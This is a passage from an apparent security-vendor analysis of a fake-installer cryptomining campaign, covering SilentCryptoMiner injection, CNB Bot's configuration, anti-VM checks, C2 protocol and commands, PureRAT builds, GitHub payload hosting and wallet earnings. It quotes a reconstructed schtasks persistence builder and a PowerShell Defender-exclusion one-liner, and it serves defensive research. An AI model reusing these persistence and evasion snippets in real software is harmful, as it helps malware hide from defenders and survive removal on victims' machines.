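<p>For reference, the relevant portion of such a Task Scheduler XML definition looks like the fragment below. This is a hedged reconstruction: only the <code>AllowHardTerminate</code> value is taken from the sample, and the surrounding elements follow the standard task schema.</p>
<pre><code>&lt;Task version=&quot;1.2&quot; xmlns=&quot;http://schemas.microsoft.com/windows/2004/02/mit/task&quot;&gt;
  &lt;Settings&gt;
    &lt;AllowHardTerminate&gt;false&lt;/AllowHardTerminate&gt;
    &lt;ExecutionTimeLimit&gt;PT0S&lt;/ExecutionTimeLimit&gt;
  &lt;/Settings&gt;
&lt;/Task&gt;
</code></pre>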
<p>If the process lacks administrator rights, it instead adds a <strong>Run</strong> key to the registry.</p>
<p><img src="https://www.elastic.co/security-labs/assets/images/fake-installers-to-monero/image35.png" alt="Malware adds a run key for persistence if not running as administrator" title="Malware adds a run key for persistence if not running as administrator" /></p>
<p>After initial installation, the process terminates. On subsequent execution by the persistence mechanism, it verifies that it is running from its installation directory before proceeding to the process injection phase.</p>
<h4>Inject watchdog and miner payloads</h4>
<p>In the samples we analyzed, the builds contain four payloads:</p>
<ul>
<li>A <code>Winring0.sys</code> driver</li>
<li>A watchdog process</li>
<li>A Monero miner</li>
<li>An Ethereum miner</li>
</ul>
<p>The malware can embed multiple miners; however, in our tests, we only observed the Monero miner being injected. In the code, only one of the two miners is injected, which we assume depends on the build configuration.</p>
<p>SilentCryptoMiner initiates injection by creating a new suspended process with a spoofed parent process. It obtains a handle to <code>explorer.exe</code> using <code>NtQuerySystemInformation</code> and <code>NtOpenProcess</code>, then configures a <code>PS_ATTRIBUTE_LIST</code> structure with the handle for parent spoofing and passes it to <code>NtCreateUserProcess</code>.</p>
<p>The payload is written to disk via <code>NtCreateFile</code> and <code>NtWriteFile</code>, then mapped into the target process's memory space through <code>NtCreateSection</code> and <code>NtMapViewOfSection</code>. Execution flow is hijacked by modifying the suspended process's entry point (held in the <code>RCX</code> register) to point to the payload's image base using <code>NtGetContextThread</code> and <code>NtSetContextThread</code>. The image base field of the process's PEB (whose address is in <code>RDX</code>) is also set to the payload's address using <code>NtWriteVirtualMemory</code>. Finally, the process is resumed with <code>NtResumeThread</code>.</p>
<p><img src="https://www.elastic.co/security-labs/assets/images/fake-installers-to-monero/image21.png" alt="Process injection procedure" title="Process injection procedure" /></p>
<p>The payload data is decrypted from a hardcoded blob in the binary using a simple XOR cipher with a hardcoded key. After injection, the blob is re-encrypted in memory to reduce forensic traces.</p>
<p><img src="https://www.elastic.co/security-labs/assets/images/fake-installers-to-monero/image15.png" alt="Decrypts, injects, and re-encrypts payload" title="Decrypts, injects, and re-encrypts payload" /></p>
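<p>The cipher is a repeating-key XOR, which is its own inverse, a property the loader relies on when re-encrypting the blob with the same routine. A minimal sketch (the actual key is hardcoded per sample and not reproduced here):</p>

```python
def xor_cipher(data, key):
    # Repeating-key XOR; applying it twice restores the original bytes,
    # which is how the loader re-encrypts the payload blob after injection.
    return bytes(b ^ key[i % len(key)] for i, b in enumerate(data))
```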
<p>In the analyzed samples, SilentCryptoMiner utilizes two distinct processes for payload injection: the watchdog component is injected into <code>conhost.exe</code>, while the miner payload targets <code>explorer.exe</code>. The <code>WinRing0.sys</code> driver is also written to disk, then loaded and used by the miner, likely to apply the MSR optimizations that boost mining performance.</p>
<h4>Watchdog and Miner Processes</h4>
<p>The watchdog is responsible for monitoring the loader file in its persistence folder: it rewrites the file to disk if it is deleted and reinstalls the persistence mechanism if the scheduled task or registry key is deleted.</p>
<p>The miner downloads its configuration from <code>(/UWP1)?/*CPU.txt</code> endpoints and communicates with its C2 via <code>[UWP1|UnamWebPanel7]/api/endpoint.php</code> API, depending on the version.</p>
<p>Based on the documentation and memory strings, we know that the miner includes supplementary protection measures: like the .NET miner detailed previously, it halts mining operations when it detects specific blocklisted processes, including tools used for process monitoring, network monitoring, antivirus protection, and reverse engineering.</p>
<h2>Code analysis - CNB Bot</h2>
<p>CNB Bot is a .NET implant with integrated loader capabilities. It implements a command-polling loop against its configured C2 servers and supports three operator commands:</p>
<ul>
<li>download-and-execute arbitrary payloads</li>
<li>self-update</li>
<li>uninstall/cleanup</li>
</ul>
<p>On Jan 31, 2026, malware researcher <a href="https://x.com/ViriBack/status/2017388775978967074">@ViriBack</a> discovered a related C2 panel that was exposed at <code>https://win64autoupdates[.]top/CNB/l0g1n234[.]php</code>, which has since been taken offline.</p>
<p><img src="https://www.elastic.co/security-labs/assets/images/fake-installers-to-monero/image16.png" alt="CNB Bot leaked panel" title="CNB Bot leaked panel" /></p>
<h3>Configuration</h3>
<p>Some configuration values for CNB Bot are not encrypted, such as the bot version (<code>1.1.6.</code>), campaign date (<code>03_26</code>), and the scheduled task name for persistence (<code>HostDataProcess</code>).</p>
<p><img src="https://www.elastic.co/security-labs/assets/images/fake-installers-to-monero/image11.png" alt="Bot version and campaign ID in plaintext" title="Bot version and campaign ID in plaintext" /></p>
<p>Sensitive strings (C2 URLs, mutex name, auth token, comms key) are stored AES-256-CBC encrypted with a hardcoded 32-byte key, which differs across campaign batches.</p>
<p>Strings can be decrypted with the following routine (shown here with PyCryptodome):</p>
<pre><code>import base64
from Crypto.Cipher import AES  # PyCryptodome

x = base64.b64decode(data)
decrypted = AES.new(hard_coded_key, AES.MODE_CBC, iv=x[0:16]).decrypt(x[16:])
</code></pre>
<p>Extracted configuration:</p>
<table>
<thead>
<tr>
<th align="left">Field</th>
<th align="left">Value</th>
</tr>
</thead>
<tbody>
<tr>
<td align="left">Mutex Name</td>
<td align="left"><code>MTXCNBV11000ERCXSWOLZNBVRGH</code></td>
</tr>
<tr>
<td align="left">C2 URL</td>
<td align="left"><code>https://tabbysbakescodes[.]ws/CNB/gate.php</code></td>
</tr>
<tr>
<td align="left">C2 URL fallback #1</td>
<td align="left"><code>https://tommysbakescodes[.]ws/CNB/gate.php</code></td>
</tr>
<tr>
<td align="left">C2 URL fallback #2</td>
<td align="left"><code>https://tommysbakescodes[.]cv/CNB/gate.php</code></td>
</tr>
<tr>
<td align="left">Auth Token</td>
<td align="left"><code>0326GJSECMHSHOEYHQMKDZ</code></td>
</tr>
<tr>
<td align="left">Comms AES Key (input)</td>
<td align="left"><code>AnCnDai@4zDsxP!a3E</code></td>
</tr>
<tr>
<td align="left">Scheduled Task</td>
<td align="left"><code>HostDataProcess</code></td>
</tr>
<tr>
<td align="left">Install Dir</td>
<td align="left"><code>%APPDATA%\HostData\</code></td>
</tr>
<tr>
<td align="left">Marker File</td>
<td align="left"><code>%APPDATA%\HostData\install.dat</code></td>
</tr>
<tr>
<td align="left">Executable</td>
<td align="left"><code>sysdata.exe</code></td>
</tr>
<tr>
<td align="left">Group / Campaign</td>
<td align="left"><code>03_26</code></td>
</tr>
<tr>
<td align="left">Bot Version</td>
<td align="left"><code>1.1.6.</code></td>
</tr>
</tbody>
</table>
<h3>Execution Flow</h3>
<p>At startup, CNB Bot performs five different checks to detect virtualized environments:</p>
<table>
<thead>
<tr>
<th align="left">Check</th>
<th align="left">Technique</th>
</tr>
</thead>
<tbody>
<tr>
<td align="left">WMI ComputerSystem</td>
<td align="left">Manufacturer/Model: &quot;vmware&quot;, &quot;virtualbox&quot;, &quot;vbox&quot;, &quot;qemu&quot;, &quot;xen&quot;, &quot;parallels&quot;, &quot;innotek&quot;, &quot;microsoft corporation&quot; (manufacturer) + &quot;virtual machine&quot; (model)</td>
</tr>
<tr>
<td align="left">WMI BIOS</td>
<td align="left">Version/Serial: &quot;vmware&quot;, &quot;virtualbox&quot;, &quot;vbox&quot;, &quot;qemu&quot;, &quot;bochs&quot;, &quot;seabios&quot;</td>
</tr>
<tr>
<td align="left">Process list</td>
<td align="left">&quot;vmtoolsd&quot;, &quot;vmwaretray&quot;, &quot;vmwareuser&quot;, &quot;vboxservice&quot;, &quot;vboxtray&quot;, &quot;xenservice&quot;</td>
</tr>
<tr>
<td align="left">Registry</td>
<td align="left">VMware Tools / VirtualBox Guest Additions keys: &quot;SOFTWARE\VMware, Inc.\VMware Tools&quot;, &quot;SOFTWARE\Oracle\VirtualBox Guest Additions&quot;, &quot;SYSTEM\CurrentControlSet\Services\VBoxGuest&quot;, &quot;SYSTEM\CurrentControlSet\Services\VBoxSF&quot;</td>
</tr>
<tr>
<td align="left">MAC Address</td>
<td align="left">&quot;00:0C:29&quot;, &quot;00:50:56&quot;, &quot;00:05:69&quot;, &quot;08:00:27&quot;, &quot;0A:00:27&quot;, &quot;00:16:3E&quot;, &quot;00:1C:14&quot;</td>
</tr>
</tbody>
</table>
<p>Each check returns zero or one, and the results are summed against a threshold. When the detection threshold is reached, the first process instance acquires a named mutex and enters an infinite sleep (<code>Thread.Sleep(int.MaxValue)</code>), appearing hung rather than terminating cleanly. Any subsequent instance that finds the mutex already held exits immediately.</p>
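<p>The scoring logic can be sketched as follows. The MAC prefixes come from the table above, while the threshold value of 2 is an assumption for illustration:</p>

```python
MAC_PREFIXES = ("00:0C:29", "00:50:56", "00:05:69", "08:00:27",
                "0A:00:27", "00:16:3E", "00:1C:14")

def mac_check(addresses):
    # One of the five checks: 1 if any NIC matches a known VM OUI, else 0
    return int(any(a.upper().startswith(MAC_PREFIXES) for a in addresses))

def is_vm(checks, threshold=2):
    # Each check contributes 0 or 1; the sum is compared to a threshold.
    # NOTE: the real threshold used by the implant is an assumption here.
    return sum(c() for c in checks) >= threshold
```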
<p>Otherwise, on first execution, the implant checks for <code>%APPDATA%\HostData\install.dat</code>. If absent, it performs the initial installation:</p>
<ul>
<li>Generates a random 5-character alphabetic subdirectory name under <code>%APPDATA%\HostData\</code></li>
<li>Copies itself to <code>%APPDATA%\HostData\&lt;random&gt;\sysdata.exe</code></li>
<li>Writes the installed path to <code>install.dat</code></li>
<li>Extracts benign dependencies <code>DiagSvc.dll</code> and <code>sdrsvc.dll</code> into the same directory</li>
<li>Writes a VBScript wrapper <code>sysdata.vbs</code> alongside the binary: <code>CreateObject(&quot;WScript.Shell&quot;).Run &quot;&quot;&quot;&lt;installed_path&gt;&quot;&quot;&quot;, 0, False</code></li>
<li>Creates a scheduled task named <code>HostDataProcess</code> via schtasks.exe, configured to run <code>wscript.exe //nologo sysdata.vbs</code> every 10 minutes at <code>HIGHEST</code> privilege</li>
<li>Launches the installed copy as a hidden process with <code>%TEMP%</code> as the working directory</li>
<li>Self-deletes the original copy via a self-deleting BAT script (<code>timeout /t 3</code>, <code>loop-del</code>)</li>
</ul>
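<p>The persistence artifacts from the steps above can be reconstructed as follows (hedged: the task name, interval, and VBScript line come from the analyzed sample, while the exact <code>schtasks.exe</code> flags are our reconstruction):</p>

```python
def build_persistence(installed_path, vbs_path):
    # VBScript wrapper that launches the implant with a hidden window (0)
    vbs = 'CreateObject("WScript.Shell").Run """%s""", 0, False' % installed_path
    # Scheduled task: every 10 minutes, highest run level
    task_cmd = [
        "schtasks", "/create", "/f",
        "/tn", "HostDataProcess",
        "/sc", "MINUTE", "/mo", "10",
        "/rl", "HIGHEST",
        "/tr", 'wscript.exe //nologo "%s"' % vbs_path,
    ]
    return vbs, task_cmd
```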
<p>On subsequent runs, when <code>install.dat</code> exists and the running path matches its contents, the implant proceeds to active operation:</p>
<ul>
<li>Sets the current working directory to <code>%TEMP%</code></li>
<li>Repairs persistence: checks if <code>sysdata.vbs</code> exists (recreates if absent) and verifies the scheduled task is configured with <code>wscript.exe</code>, re-registering it if necessary</li>
<li>Acquires a named mutex (<code>MTXCNBV11000ERCXSWOLZNBVRGH</code>) - exits if already running</li>
<li>Instantiates the victim profiler, C2 comms, and command dispatcher</li>
<li>Issues a single POST to the C2 with <code>payload: &quot;fetch&quot;</code>, handles any returned task</li>
<li>Exits - next execution is driven entirely by the 10-minute scheduled task trigger</li>
</ul>
<p><img src="https://www.elastic.co/security-labs/assets/images/fake-installers-to-monero/image7.png" alt="CNB Bot main code logic" title="CNB Bot main code logic" /></p>
<h3>C2 Communication</h3>
<p>The malware communicates with its C2 by issuing HTTP POST requests with the Content-Type set to <code>application/x-www-form-urlencoded</code>. Each field value is independently AES-256-CBC encrypted with a random IV. The AES key is derived as the SHA-256 hash of the hardcoded communications passphrase (<code>AnCnDai@4zDsxP!a3E</code>). The IV is prepended to the ciphertext, and the entire blob is base64-encoded; C2 responses follow the same format.</p>
<pre><code>key = SHA-256('AnCnDai@4zDsxP!a3E')
ciphertext = AES-256-CBC-encrypt(key, iv=random_iv, data=plaintext_field_value)
encrypted_field_value = base64_encode(random_iv + ciphertext)
</code></pre>
<p>Fields sent on every request:</p>
<table>
<thead>
<tr>
<th align="left">Field</th>
<th align="left">Value</th>
</tr>
</thead>
<tbody>
<tr>
<td align="left"><code>desktop</code></td>
<td align="left">machine name</td>
</tr>
<tr>
<td align="left"><code>username</code></td>
<td align="left">username</td>
</tr>
<tr>
<td align="left"><code>os</code></td>
<td align="left">Windows version</td>
</tr>
<tr>
<td align="left"><code>version</code></td>
<td align="left">bot version (<code>1.1.6.</code>)</td>
</tr>
<tr>
<td align="left"><code>privileges</code></td>
<td align="left">user OR admin</td>
</tr>
<tr>
<td align="left"><code>cpu</code></td>
<td align="left">processor name from the registry</td>
</tr>
<tr>
<td align="left"><code>gpu</code></td>
<td align="left">GPU name(s) from registry</td>
</tr>
<tr>
<td align="left"><code>gpu_type</code></td>
<td align="left">yes (discrete) / no (integrated)</td>
</tr>
<tr>
<td align="left"><code>group</code></td>
<td align="left">group / campaign ID (<code>03_26</code>)</td>
</tr>
<tr>
<td align="left"><code>client_path</code></td>
<td align="left">full path of running executable</td>
</tr>
<tr>
<td align="left"><code>local_ipv4</code></td>
<td align="left">external IP via <code>ipify[.]org</code> / <code>icanhazip[.]com</code> / <code>ident[.]me</code></td>
</tr>
<tr>
<td align="left"><code>auth_token</code></td>
<td align="left">authentication token (<code>0326GJSECMHSHOEYHQMKDZ</code>)</td>
</tr>
<tr>
<td align="left"><code>timestamp</code></td>
<td align="left">Unix epoch (UTC)</td>
</tr>
<tr>
<td align="left"><code>payload</code></td>
<td align="left">Command string (“fetch”, “completed”)</td>
</tr>
</tbody>
</table>
<p>A server response decrypts to either a task string, <code>“NO TASKS”</code>, or <code>“REGISTERED/UPDATED”</code>. When the client requests a task through <code>payload: “fetch”</code>, if a task exists for the client, the C2 response decrypts to a <code>&lt;sep&gt;</code>-delimited task string: <code>task_id&lt;sep&gt;command&lt;sep&gt;argument&lt;sep&gt;RSA_sig</code>.</p>
<p><img src="https://www.elastic.co/security-labs/assets/images/fake-installers-to-monero/image32.png" alt="CNB Bot dispatcher function" title="CNB Bot dispatcher function" /></p>
<p>Prior to dispatch, each task undergoes RSA-SHA256 signature verification. The signed message is the concatenated string <code>task_id&lt;sep&gt;command&lt;sep&gt;argument</code>, and the signature is the base64-decoded <code>RSA_sig</code> field. A hardcoded RSA-2048 public key is used for verification.</p>
<p><img src="https://www.elastic.co/security-labs/assets/images/fake-installers-to-monero/image20.png" alt="RSA-SHA256 task verification" title="RSA-SHA256 task verification" /></p>
<p>Tasks failing verification are silently dropped. Without the operator's RSA private key, third parties cannot issue commands to infected hosts even with full C2 access.</p>
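<p>The task handling can be sketched as below. The <code>&lt;sep&gt;</code> token stands for the sample's delimiter, and the RSA-SHA256 verification against the hardcoded public key is omitted from the sketch:</p>

```python
SEP = "<sep>"  # placeholder for the sample's actual delimiter token

def parse_task(blob):
    # Task format: task_id<sep>command<sep>argument<sep>RSA_sig
    task_id, command, argument, sig_b64 = blob.split(SEP)
    # The RSA-SHA256 signature covers the first three fields re-joined
    signed_message = SEP.join((task_id, command, argument)).encode()
    return task_id, command, argument, signed_message, sig_b64
```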
<h3>Supported Commands</h3>
<p>Three commands are supported, described in the table below:</p>
<table>
<thead>
<tr>
<th align="left">Command</th>
<th align="left">Behavior</th>
</tr>
</thead>
<tbody>
<tr>
<td align="left"><code>download_execute</code></td>
<td align="left">Downloads URL argument to <code>%TEMP%\&lt;random&gt;.&lt;ext&gt;</code>. Execute: .exe (hidden), .bat/.cmd (cmd /c), .vbs (wscript.exe), other (ShellExecute).</td>
</tr>
<tr>
<td align="left"><code>update</code></td>
<td align="left">Downloads URL argument to staging location <code>%TEMP%\tmp_updt236974520367.exe</code>. Runs BAT to: kill current PID, overwrite installed binary with staged download, delete staging file, and self-delete BAT.</td>
</tr>
<tr>
<td align="left"><code>uninstall</code></td>
<td align="left">Deletes the scheduled task, removes <code>install.dat</code>, self-deletes via a BAT script, and removes the install directory and <code>%APPDATA%\HostData\</code>.</td>
</tr>
</tbody>
</table>
<h2>Earlier Campaigns</h2>
<p>Pivoting on the PureRAT mutex <code>Aesthetics135</code>, we discovered an earlier wave of the operation that presented a different fake installer UI.</p>
<p><img src="https://www.elastic.co/security-labs/assets/images/fake-installers-to-monero/image25.png" alt="Fake installer interface from early 2025" title="Fake installer interface from early 2025" /></p>
<h3>Early 2025 Build</h3>
<p>The sample <code>bb48a52bae2ee8b98ee1888b3e7d05539c85b24548dd4c6acc08fbe5f0d7631a</code> (first seen 2025-01-30) is a Themida and .NET Reactor-protected Windows Forms application that drops PureRAT v0.3.9.</p>
<p>It consists of three classes: <code>Fooo1rm</code> (the ApplicationContext entry point), <code>Form2</code> (the installer UI and the PureRAT dropper), and <code>Form3</code> (a fake registration lure). The code structure closely resembles the more recent campaigns.</p>
<p>On initialization, it immediately invokes a hidden PowerShell one-liner to add itself to Microsoft Defender exclusions before any UI appears: <code>powershell.exe -WindowStyle Hidden Add-MpPreference -ExclusionPath '&lt;self_path&gt;'; Add-MpPreference -ExclusionProcess '&lt;self_path&gt;'</code>. A timer with a 2,846 ms interval fires, instantiating and showing Form2.</p>
<p><code>Form2</code> presents a progress bar dialog titled “Getting things ready” with a 12-step timer ticking every 1,000 ms, simulating a legitimate installation.</p>
<p><img src="https://www.elastic.co/security-labs/assets/images/fake-installers-to-monero/image18.png" alt="Fake loading bar" title="Fake loading bar" /></p>
<p>A second PowerShell exclusion command covers <code>%LocalAppData%</code>, <code>%AppData%</code>, the drop directory <code>%LocalAppData%\winbuf</code>, and process names including <code>winbuf.exe</code>, <code>wintrs.exe</code>, and <code>AddlnProcess.exe</code>. The PureRAT v0.3.9 payload is extracted from the assembly manifest resource and written to <code>%LocalAppData%\winbuf\winbuf.exe</code>. Persistence is established via <code>schtasks.exe</code>.</p>
<p>Extracted PureRAT config:</p>
<ul>
<li><code>wndlogon.hopto.org</code> (C2 #1)</li>
<li><code>wndlogon.itemdb.com</code> (C2 #2)</li>
<li><code>wndlogon.kozow.com</code> (C2 #3)</li>
<li><code>wndlogon.ydns.eu</code> (C2 #4)</li>
<li><code>Aesthetics135</code> (mutex and C2 comms key)</li>
<li><code>29-01-25</code> (build / campaign date)</li>
</ul>
<p><code>Form3</code> serves purely as a social engineering mechanism to drive <a href="https://en.wikipedia.org/wiki/Cost_per_action">Cost Per Action</a> (CPA) offer completions through a content locker.</p>
<blockquote>
<p>Content lockers are a monetization technique in which access to a resource is gated behind completing CPA (Cost Per Action) offers, such as filling out a survey or signing up for a service. The malware operator earns a commission each time a victim completes one of these offers.</p>
</blockquote>
<p>It presents a fake “Registration Required” dialog with a key entry field, a “Validate” button, and a hyperlink labeled “here” that opens <code>https://tinyurl[.]com/cmvt944y</code>. Key validation is entirely fake. Regardless of input, the handler introduces a hardcoded 2-second delay, then always returns “Invalid key. Please try again.”</p>
<p><img src="https://www.elastic.co/security-labs/assets/images/fake-installers-to-monero/image2.png" alt="Fake registration key input invalidation" title="Fake registration key input invalidation" /></p>
<p>The TinyURL shortlink <code>tinyurl[.]com/cmvt944y</code> redirects to the lure page at <code>rapidfilesdatabaze[.]top/files/z872d515ea17b4e6c3abca9752c706242/</code>.</p>
<p>The page used to host a minimal HTML document titled &quot;Registration Key is Ready&quot;, designed to trick the victim into interacting with the CPA content locker. It presents a download icon and a fake file link labeled <code>Registration_Key.txt</code>, alongside a unique campaign tracking ID (<code>z872d515ea17b4e6c3abca9752c706242</code>) displayed in the page body.</p>
<p>The content locker JavaScript (<code>3193171.js</code>) is loaded from <code>d3nxbjuv18k2dn.cloudfront[.]net</code>, and clicking the <code>Registration_Key.txt</code> link triggers the offer wall under the pretext of unlocking a license key.</p>
<p><img src="https://www.elastic.co/security-labs/assets/images/fake-installers-to-monero/image31.png" alt="Content at rapidfilesdatabaze[.]top/files/z872d515ea17b4e6c3abca9752c706242/" title="Content at rapidfilesdatabaze[.]top/files/z872d515ea17b4e6c3abca9752c706242/" /></p>
<p><img src="https://www.elastic.co/security-labs/assets/images/fake-installers-to-monero/image23.png" alt="CPA content locker JS (3193171.js)" title="CPA content locker JS (3193171.js)" /></p>
<h3>Late 2023 Build</h3>
<p>An older sample, <code>6a01cc61f367d3bae34439f94ff3599fcccb66d05a8e000760626abb9886beac</code> (first seen 2023-11-09), presented a similar fake installer UI. This represents the earliest activity we attributed to this threat actor based on shared infrastructure and tooling.</p>
<p><img src="https://www.elastic.co/security-labs/assets/images/fake-installers-to-monero/image29.png" alt="Fake installer interface from late 2023" title="Fake installer interface from late 2023" /></p>
<p>This campaign build dropped PureRAT v0.3.8B, in which the in-memory PE loader component used a SmartAssembly-protected PureCrypter.</p>
<p>Extracted PureRAT config:</p>
<ul>
<li><code>wndlogon.hopto.org</code> (C2 #1)</li>
<li><code>wndlogon.itemdb.com</code> (C2 #2)</li>
<li><code>wndlogon.kozow.com</code> (C2 #3)</li>
<li><code>wndlogon.ydns.eu</code> (C2 #4)</li>
<li><code>Aesthetics135</code> (mutex and C2 comms key)</li>
<li><code>09.11.23</code> (build / campaign date)</li>
</ul>
<p>On the installation window, the “go here” hyperlink opens a short link <code>https://t[.]ly/MQXPm</code> that redirects to the lure page <code>https://softwaredlfast[.]top/files/n71fGbs2b7XceW3op71aQsrx41Rkeydl/</code>, which presents two outgoing fake download links:</p>
<ul>
<li><code>https://rapidfilesbaze[.]top/z78fGbs2b7XceWop21aQsrx41Rkeydsktp/</code></li>
<li><code>https://rapidfilesbaze[.]top/z78fGbs2b7XceWop21aQsrx41Rkeymbl/</code></li>
</ul>
<p><img src="https://www.elastic.co/security-labs/assets/images/fake-installers-to-monero/image27.png" alt="Content at https://softwaredlfast[.]top/files/n71fGbs2b7XceW3op71aQsrx41Rkeydl/" title="Content at https://softwaredlfast[.]top/files/n71fGbs2b7XceW3op71aQsrx41Rkeydl/" /></p>
<p>Both links were offline at the time of analysis. However, historical data indicates that <code>rapidfilesbaze[.]top</code> has been used consistently for CPA-style offer lures.</p>
<p>A <a href="http://URLScan.io">URLScan.io</a> archived response for a related path (<code>rapidfilesbaze[.]top/h74fGbs2b7XceWop71aQsrx41-Registration-Key-Mobile/</code>) confirms the site's use as a lure landing page.</p>
<p><img src="https://www.elastic.co/security-labs/assets/images/fake-installers-to-monero/image12.png" alt="Content at rapidfilesbaze[.]top/h74fGbs2b7XceWop71aQsrx41-Registration-Key-Mobile/" title="Content at rapidfilesbaze[.]top/h74fGbs2b7XceWop71aQsrx41-Registration-Key-Mobile/" /></p>
<p>The downstream unlocker site at <code>https://unlockcontent[.]net/cl/i/me9mn2</code> remains active as of this writing.</p>
<p><img src="https://www.elastic.co/security-labs/assets/images/fake-installers-to-monero/image37.png" alt="Content at https://unlockcontent[.]net/cl/i/me9mn2" title="Content at https://unlockcontent[.]net/cl/i/me9mn2" /></p>
<h2>GitHub Profiles</h2>
<p>Beyond the C2 infrastructure, the threat actor abuses GitHub as a payload delivery CDN, hosting staged binaries across two identified accounts. This technique shifts the download-and-execute step away from operator-controlled infrastructure to a trusted platform, reducing detection friction. Both profiles were confirmed through decrypting C2 task traffic captured by VirusTotal sandboxes, which issued download-and-execute tasks pointing directly to raw GitHub content URLs. The operator routinely deletes individual binaries and entire repositories; the files documented below were captured via VirusTotal submissions or direct retrieval from GitHub prior to deletion.</p>
<p>The first profile, <code>https://github[.]com/lebnabar198</code>, surfaced during analysis of Campaign 2. After decrypting the C2 traffic from the <code>windirautoupdates[.]top</code> server, we observed the PureRAT implant being instructed to fetch a payload from this account, specifically the custom XMRig loader <code>MnrsInstllr_240126.exe</code>. This establishes a direct operational link between the PureRAT C2 and this GitHub profile.</p>
<p>The second profile, <code>https://github[.]com/ugurlutaha6116</code>, was identified by decrypting traffic from a PureRAT loader (SHA-256: <code>e1e87d11079d33ec1a1c25629cbb747e56fe17071bde5fd8c982461b5baa80a4</code>), which used the same PBKDF2 key derivation structure with the comms key <code>Aesthetics152</code>. The decrypted task pointed to the hosted payload <code>PM3107.exe</code>.</p>
<p>The hosted files map to the following payloads:</p>
<table>
<thead>
<tr>
<th align="left">Filename</th>
<th align="left">Associated payload</th>
</tr>
</thead>
<tbody>
<tr>
<td align="left"><code>CNB-v112-zUpdt-inPmnr.exe</code></td>
<td align="left">CNB Bot</td>
</tr>
<tr>
<td align="left"><code>MyXMRmnr_Instllr_0302.exe</code></td>
<td align="left">Custom XMRig loader</td>
</tr>
<tr>
<td align="left"><code>MnrsInstllr_240126.exe</code>, <code>MnrsInstllr_030126.exe</code></td>
<td align="left">Custom XMRig loader</td>
</tr>
<tr>
<td align="left"><code>PM2311.exe, PM1109.exe</code>, …</td>
<td align="left">PureMiner</td>
</tr>
<tr>
<td align="left"><code>Pmnr_1303_wALL.exe</code>, <code>Pmnr_Instllr_1303.exe</code>, …</td>
<td align="left">PureMiner</td>
</tr>
<tr>
<td align="left"><code>A_Instllr_250525.exe</code></td>
<td align="left">AsyncRAT</td>
</tr>
<tr>
<td align="left"><code>U_n_P_Installer_220725.exe</code>, <code>U_n_P_Installer_110725.exe</code>, …</td>
<td align="left">Loader for SilentCryptoMiner &amp; PureMiner</td>
</tr>
<tr>
<td align="left"><code>umnr_120525.exe</code>, <code>Umnr_1403_frPmnr.exe</code>, …</td>
<td align="left">SilentCryptoMiner</td>
</tr>
<tr>
<td align="left"><code>plsr_instllr_1804.exe</code></td>
<td align="left">Pulsar RAT</td>
</tr>
</tbody>
</table>
<h2>Monero Wallet Analysis</h2>
<p>During our analysis of the cryptominer payloads, we successfully extracted four active Monero (XMR) wallet addresses from the malware's configuration. Because the threat actor routes their compromised hosts through public mining pools, we can query the pools' public dashboards using these wallet addresses, which provides insight into the operational scale and profitability of the campaigns.</p>
<p><img src="https://www.elastic.co/security-labs/assets/images/fake-installers-to-monero/image30.png" alt="Tracking mining activity through a public dashboard" title="Tracking mining activity through a public dashboard" /></p>
<p>Based on the telemetry available at the time of writing, here is the current status of the attacker's mining operations:</p>
<ul>
<li><strong>Wallet 1:</strong> <code>87NnUp8GKVBZ8pFV75Gas4A5nMMH7gEeo8AXBhm9Q6vS5oQ6SzCYf1bJr7Lib35VN2UX271PAXeqRFDmjo5SXm3zFDfDSWD</code>
<ul>
<li><strong>Active Workers:</strong> 7</li>
<li><strong>Estimated Hashrate Return:</strong> ~0.0172 XMR / day</li>
<li><strong>Total Paid Out:</strong> 2.2 XMR</li>
</ul>
</li>
<li><strong>Wallet 2:</strong> <code>89FYoLrfXwEDAVAsVYbhAfg3mATUtBzNAK2LG8wwDKfNTRhmNRTBn1VbwpFxEpJ8h5fQa2A4CS1tpRv7amUdJ3ZbUoVu6T1</code>
<ul>
<li><strong>Active Workers:</strong> 3</li>
<li><strong>Estimated Hashrate Return:</strong> ~0.02 XMR / day</li>
<li><strong>Total Paid Out:</strong> 4.23 XMR</li>
</ul>
</li>
<li><strong>Wallet 3:</strong> <code>89WoZKYoHhcNEFRV8jjB6nDqzjiBtQqyp4agGfyHwED1XyVAoknfVsvY1CwEHG6nwZFJGFTF5XbqC4tAQbnoFFCX8UQof3G</code>
<ul>
<li><strong>Active Workers:</strong> 2</li>
<li><strong>Estimated Hashrate Return:</strong> ~0.0057 XMR / day</li>
<li><strong>Total Paid Out:</strong> 11.69 XMR</li>
</ul>
</li>
<li><strong>Wallet 4:</strong><br />
<code>83Q1PKZ5yXsP8SCqjV3aV7B3UoBB3skPp49G1VnnGtv5Y5EUbFQTXvzR9cZshBYBBfd8Dm1snkkud431pdzEZ2uJTad1CiC</code>
<ul>
<li><strong>Active Workers:</strong> 2</li>
<li><strong>Estimated Hashrate Return:</strong> ~0.0036 XMR / day</li>
<li><strong>Total Paid Out:</strong> 9.76 XMR</li>
</ul>
</li>
</ul>
<p>With a combined total of 27.88 XMR (~USD $9,392) already paid out to the attacker, this demonstrates that low-and-slow cryptojacking operations can yield consistent financial returns over time.</p>
<h2>Agentic Payload and Configuration Extraction Pipeline</h2>
<p>In this research, we examined several hundred infection chains across the campaigns we described. Each chain consists of samples, mainly .NET binaries, that are either loaders or final payloads, layered with .NET Reactor obfuscation and often Themida packing.</p>
<p>The large number of these chains makes manual unpacking and configuration extraction time-consuming and difficult to scale. This is why, as part of this research, we used the Claude Opus 4.5 model to quickly vibecode a payload and configuration extraction pipeline. In this section, we provide details on the choices we made and the results we obtained with this method.</p>
<h4>Triage</h4>
<p>To optimize processing time, this phase focuses on broadly exploring infection chains using VirusTotal. We begin by obtaining a list of hashes from VirusTotal based on a specific pivot: for instance, the README.txt content, which can be used to identify other ISOs.</p>
<p><img src="https://www.elastic.co/security-labs/assets/images/fake-installers-to-monero/image39.png" alt="VirusTotal ISO pivot" title="VirusTotal ISO pivot" /></p>
<p>Claude is instructed to use a Python script to perform a recursive download, gathering information about the embedded binaries and dropped files associated with each file hash. Claude then uses its “intelligence” to identify the next link in the chain and continues its investigation until it reaches what it considers the final binary in that chain. After exploring all chains, Claude analyzes the patterns and groups them into chain types. Finally, the results are compiled into a CSV file for subsequent analysis.</p>
<p>The data we obtained includes the starting hash from VirusTotal and the final hash, representing the last file Claude successfully tracked. This demonstrates that, with the right guidance, Claude can effectively track entire chains using only information from VirusTotal.</p>
<p><img src="https://www.elastic.co/security-labs/assets/images/fake-installers-to-monero/image6.png" alt="Triaged data" title="Triaged data" /></p>
